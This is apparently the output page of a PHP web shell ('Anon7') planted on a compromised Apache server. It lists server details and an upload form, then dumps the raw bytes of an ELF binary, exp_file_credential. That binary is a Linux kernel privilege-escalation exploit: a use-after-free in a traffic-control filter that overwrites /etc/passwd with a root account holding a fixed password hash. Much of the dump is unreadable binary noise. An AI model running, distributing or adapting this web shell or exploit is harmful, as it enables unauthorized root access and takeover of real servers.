KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /home/queenjbs/www/files/muti/shop/data/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/queenjbs/www/files/muti/shop/data/exp_file_credential
ELF>@&@P@8
@@@@xx   33```0l0|0|@l@|@|888  XXXDDStd888  PtdeeeQtdRtd0l0|0|/lib64/ld-linux-x86-64.so.2GNUGNUY>`z6>JW@GNU556em9dM DQ5G.K~wR=^s [isb}x- "p@libpthread.so.0_ITM_deregisterTMCloneTable_ITM_registerTMCloneTablewrite__errno_locationclosepthread_createreadopenrecvmsgsendmsglibc.so.6socketstrcpyexitstrncmppipeperrorget_current_dir_nameputsfork__stack_chk_failclockgetpidchmod__assert_failmmapsymlinksched_setaffinitystrlenunsharememsetwritevchdirvsnprintfmemcpymallocgetgidstderrsystemgetuidsetrlimitusleepfprintf__cxa_finalizesyscallgetrlimitmount__libc_start_mainsysconffreeGLIBC_2.2.5GLIBC_2.14GLIBC_2.3.4GLIBC_2.4__gmon_start__ ui	ti	ii
ui	0| '8|&(`0`"05@6X~`~h~p~x~~~~	~
~~~
~~~~~~~~~ (08@ H!P#X$`%h&p'x()*+,-./1234HH_HtH5"^%#^hhhhhhhhqhah	Qh
Ah1h!h
hhhhhhhhhhqhahQhAh1h!hhhh h!h"h#h$h%h&h'qh(ah)Qh*Ah+1h,!h-h.h/%\D%
[D%[D%ZD%ZD%ZD%ZD%ZD%ZD%ZD%ZD%ZD%ZD%ZD%ZD%ZD%ZD%ZD%ZD%}ZD%uZD%mZD%eZD%]ZD%UZD%MZD%EZD%=ZD%5ZD%-ZD%%ZD%ZD%ZD%
ZD%ZD%YD%YD%YD%YD%YD%YD%YD%YD%YD%YD%YD%YD%YD%YD1I^HHPTLV-H
,H=*rYH=YHYH9tHNYHt	H=YH5YH)HH?HHHtH%YHtfD=]Yu+UH=YHtH=Y)d5Y]wUHH}Hu]UHH\dH%(HE1HpHƸHHH\HHhHhwMHhHHHpHHHh?HHH4HpHH	HHpH¾tH=L8HEdH3%(tUHHHHH`HhLpLxt )E)M)U)])e)m)u)}dH%(HH1Dž(Dž,0HEH0HPH8H(HH@Hƅ?H@HHHǸ  unHcH@ HΉHcH9t.$ O$ .HHdH34%(tUHHH=6H=6H6HEH}u
HEHt
HEHt
H5~6H=}6DUHAHb6H5c6]UHH dH%(HE1HEHEHEHEHƿ	HEHEHEHEHƿHEHEHEHEHEHEHEHƿuHEHEHEHEHƿTHE7HEHEHEHƿ3y[HEHEHETT
HEHƿy"H=[5*H5O5HEdH3%(tUHH|EdEtH=5@tH=4H54H=4tH=4nEH54H=4tH=44JEH54H=4}tH=4UHH0H}uHU؉MHEHEEHEfPEPHEf}tEHcHEHHHEHHEUHH0H}uUHMDEԋEԃEHE‹E‹E9v%HRUH5F4HǸq|HEHHEHHEEHEfPEHEf}tEHcHEHHHEHH2HE‹EHEUHH H}uUHEHHEHHEUuHEAHHEUHH}HuHEHHEHH+EHEfHE]UHH|dH%(HE1HEHEHHEHEHE$HEf@HEf@$HEHHEHE@HEHE@EEE‹E	HEPHEAH
2HHEHEHEHEHEEfEHEHEHEHEHEHEHEHEHEEHEHEHEHM|HΉbHMdH3%(tUHHlhd`Df\dH%(HE1 HEHE HHEHEHEHHEHE$\HEfPHEf@,HEHHEDžxDž|x‹|	HEPHE@HEHE`PHEAH
0HHEHHEHhHEAHѺHHdHEAHѺHmHUHEHHHEHEHEHEHEEfEHEHEHEHEHEHEHEHEHEEHEHEHEHMlHΉHEHHMdH3%(tUHH}ufEuE‹EUEAeUHH }uEE}w	}vH
e2vH5.H=/E	E}tE%tEUHHlhdH%(HE1@HEHE@H HEHEHEHHEHE$HEf@	HEf@-HEHHEDžxDž|x‹|	HEPHE@HEHEhPHEAH
-HHEHHEHUHEHHHEHEHEHEHEEfEHEHEHEHEHEHEHEHEHEEHEHEHEHMlHΉuHE@HHE@HEHEHMlHΉ6EȃtH=,BHEHMdH3%(tUHH}uE‹E‹E։UHH<8H0H(D$dH%(HE1$HH(H=/vH
t/H5+H=A,@:HXHX@HjHXH`H`HH`H`$H`f@H`f@,HXHHhDžLDžPL‹P	HhPHh@HhHh8PH`AH
f+@HH`@HHpH`@HHx$fTfDžVHTH`AHѺ@H}H`@HNHE0HEDžHHE0HHEHEHEf@HEf@HEHHEHEfEfEHUHEHpHHEH(H0HEHIHHEH(H0HEH"HHEHEH+EHpHUH`AHщ@HPHT9HHUH`HH\HxH`HHCHpH`HH*H`HEH`HEHEEfEHEHEHEHEHEHEHEHEHEEHEHEHEHM<HΉHEHFHXH7HMdH3%(tUHHlhdH%(HE1@HEHE@HNHEHEHEHHEHE$HEf@	HEf@-HEHHEDžxDž|x‹|	HEPHE@HEHEhPHEAH
t'HHEHHEHUHEHH%HEHEHEHEHEEfEHEHEHEHEHEHEHEHEHEEHEHEHEHMlHΉHE@HHE@HEHEHMlHΉdEȃtH=
&pHEHMdH3%(tUHHdH%(HE1H=&,H=.$||yH=%!HDž0DžtGtHcHHAA"HQHttef~tH
_(BH5$H=h%_HHHH5M%HDžxLxHHHHHHtHxHcHHHHHxx~BHH|HΉHyH=$HHH+H*
{'^HfHnH=l$AHMdH3%(tUHH dH%(HE1Huser:$1$Huser$k8sHHHntSoh7jhHsc6lwspjHHHsU.:0:0:H/root/roHHHot:/bin/bashH H(H0xHHHjAHH\AHH@t@@HHΉHyH=@#H=D#HudH34%(trUH]UHAUATSHH$HH$HhdH%(HE1HDžHDžHHHHDžHDžHHƿju"HHHH=v"?H="M/?)?uH
$H5
!H=f">?HHΉHtH58">A$?H5"MHtH5!>HHΉ5HtH5!y+>A; 
H=!>H5a!HtH5P!N>HHΉHtH5!@BDž
=ЉH= HcHHu=HHH[=H
"H5H= <9a<AH=X 4H=] (Džh
<ЉH=HcHH<HHHi<H
!H5H=DžHHH<D,HHH<D$EEډƿ8H?H=QHHH;<;HHHu; ;HHSH<HHhH-;t::wH=KDž;HHΉK:HHΉOHtH5h:;:9?x:u:9
4:u1:t*H=bp:H5y	H9HǸ+HDžHDžHDžHDžHDžHDžHDžHDžHDžHDžHDž HDž(HDž0HDž8HDž@HDžHHDžPHDžXHDž`HDžhHDžpHDžxHDžHDžHDžHDžHDžHDžHDžHDžHDžHDžH0HΉHH5:HNu8H5!4HHH=	$b8H5kUH]UHHPdH%(HE1H=7*uH5H=7uH5hH=7uH5`AH=j7uH59H=K7uH5TY6[Dž6HHΉFHwH5HK6HH=Džu^Dž8
J6ЉH5HǸo9|'Dž8
5ЉH5HǸ9|H=5H5'&uADkHMdH3%(
-Dž8
4ЉH4HǸ#'~H=4H5HtH5;uH
BH5H=mfHDžHDžHDžHDžHDžHDžHDžHDžHDž HDž(HDž0HDž8HDž@HDžHHDžPHDžXHDž`HDžhHDžpHDžxHEHEHEHEHEHEHEHEHEHEHEHEHEHEHHAH2HHΉ+HtH5	oDž&(Dž1HA v;|HA 7HA 
HA 1H5HtH5X1HHΉHtH5P 1HA ;;|H=xDžC;t-9t‹։C9|0H5HtH5/i0HHΉHtH5'‹։‹։u!‹։J;|H=(/H5HtH50UHSH(}HudH%(HE1AA! H.H. HH.H.HEHHH.IHHQHǸH.HH=4wH.HǸEHL.HH.H-Hq.HH.H_.H-HHEHΉEHH=1.LtH
H5fH=H=Hu' -HMHΉEuH=YH=SH]dH3%(t
H([]AWL=(AVIAUIATAUH-(SL)HHt1LLDAHH9uH[]A\A]A^A_ff.HH/etc/passwduser:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash
sched_setaffinity()rm -rf exp_dir; mkdir exp_dir; touch exp_dir/datatouch exp_dir/data2exp_dir./uaf./datafusectl/sys/fs/fuse/connectionssetrlimit[-] unshare(CLONE_NEWUSER)deny/proc/self/setgroups[-] write_file(/proc/self/set_groups)0 %d 1
/proc/self/uid_map[-] write_file(/proc/self/uid_map)/proc/self/gid_map[-] write_file(/proc/self/gid_map)addattr_l ERROR: message exceeded bound of %d
sfqrouteexp_file_credential.cfrom <= 0xff && to <= 0xffsize of sender address is wrongspray_len * spray_count < 0x3000basicstart slow writeerror open uaf fileoffset > 0hhhhhslow writewrite done, spent %f s
failed to writeshould be after the slow writeOld limits -> soft limit= %ld 	 hard limit= %ld 
starting exploit, num of cores: %d
sockfd != -1read from parentOKwrite to childfreed the filter object./data2fds[i] > 0double free donespraying filesfd_2[i] > 0found overlap, id : %d, %d
closed overlapread from file sprayno overlap found :(...usernot successful : %s
fail to create pipes
read file spraygot cmd, start spraying %s
spray donedefrag donefailed write defragsprayfd != -1failed read defragwrite to parent
spray 256 done256 freed done%s/%sself path %s
pipe(pipe_main) == 0prepare donesucceedfailedcalc_handleadd_tc_basicslow_writeexploitrun_expmain.A; X@hhxx(ath8Xxr\|8Xx\8,Xx{x(zRxH/D$4FJw?:*3$"\tEC
JEC
EC
EC
g.EC
e,uFEC
=LEC
lgEC
^EC
UEC
L=EC
tEC
\\EC
S,BEC
yLpEC
gl
6EC
- .EC
e.nEC
e|6EC
-5EC
,AEC
8,$EC
[LEC
dl9EC
B$EC
$EC
EDeFIE E(D0H8G@n8A0A(B BBB '& 
S0|8|o
 @~	ooooo@|0 @ P ` p         !! !0!@!P!`!p!!!!!!!!!"" "0"@"P"`"p"""""""""## #``GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.08X|	
 
  0#@#@&S`ef0|8|@|@~@p&&!&7HF8|m 'y0|0()O*.}*Fxee
e4eNehek8|@|0|e@~5 S$B`La ; }h p$:6#0-@5.J^+n8u2B|y.=:-SHx#5eI^y?$`
)9FR(Ydy. l>A`!+@Se
;OȀ?@&/[2pg<'r)'8CQd`H?R36&07?Q8]Z<5h$.Uu ,g"5n@/D0\crtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.8061__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryexp_file_credential.cwrite_fileuse_temporary_dirsetup_commonadjust_rlimit__PRETTY_FUNCTION__.32340__PRETTY_FUNCTION__.32365__PRETTY_FUNCTION__.32410__PRETTY_FUNCTION__.32436__PRETTY_FUNCTION__.32482__PRETTY_FUNCTION__.32510__FRAME_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_finifree@@GLIBC_2.2.5pthread_create@@GLIBC_2.2.5__errno_location@@GLIBC_2.2.5cpu_coresstrncmp@@GLIBC_2.2.5_ITM_deregisterTMCloneTablerun_sprayspray_num_2strcpy@@GLIBC_2.2.5passwdsendmsg@@GLIBC_2.2.5writev@@GLIBC_2.2.5puts@@GLIBC_2.2.5delete_tc_basicvsnprintf@@GLIBC_2.2.5unshare@@GLIBC_2.4overwritewrite@@GLIBC_2.2.5delete_tcgetpid@@GLIBC_2.2.5setup_namespace_edataadd_tcclock@@GLIBC_2.2.5addattr_nest_endaddattr_lrun_expstrlen@@GLIBC_2.2.5mount@@GLIBC_2.2.5globalchdir@@GLIBC_2.2.5__stack_chk_fail@@GLIBC_2.4getuid@@GLIBC_2.2.5mmap@@GLIBC_2.2.5system@@GLIBC_2.2.5symlink@@GLIBC_2.2.5__assert_fail@@GLIBC_2.2.5pipe_defragmemset@@GLIBC_2.2.5pre_exploitfd_2close@@GLIBC_2.2.5pipe@@GLIBC_2.2.5sched_setaffinity@@GLIBC_2.3.4overlap_aread@@GLIBC_2.2.5__libc_start_main@@GLIBC_2.2.5pipe_file_spray__data_startpipe_parenttargetpipe_childfprintf@@GLIBC_2.2.5syscall@@GLIBC_2.2.5add_qdisc__gmon_start__overlapped__dso_handlewrite_cmdmemcpy@@GLIBC_2.14_IO_stdin_usedgetgid@@GLIBC_2.2.5get_current_dir_name@@GLIBC_2.2.5self_path__libc_csu_initmalloc@@GLIBC_2.2.5spray_num_1calc_handlepin_on_cpusetrlimit@@GLIBC_2.2.5DumpHex__bss_startrecvmsg@@GLIBC_2.2.5chmod@@GLIBC_2.2.5run_writefdspost_exploitopen@@GLIBC_2.2.5perror@@GLIBC_2.2.5sysconf@@GLIBC_2.2.5delete_tc_overlap_bsockfdcontentexit@@GLIBC_2.2.5__TMC_END__slow_writeaddattr_nestgetrlimit@@GLIBC_2.2.5_ITM_registerTMCloneTablepipe_mainaddattr__cxa_finalize@@GLIBC_2.2.5fork@@GLIBC_2.2.5add_tc_basicusleep@@GLIBC_2.2.5stderr@@GLIBC_2.2.5socket@@GLIBC_2.2.5add_tc_.symtab.strtab.shstrtab.interp.note.gnu.property.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.plt.sec.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.data.bss.comment#88 6XX$I|| Wo(a(i qon~opB      0#0#@#@#@&@&u-SS
``eeff00|0l8|8l@|@l@~@np8@8p 08p+hp8	7/

Anon7 - 2021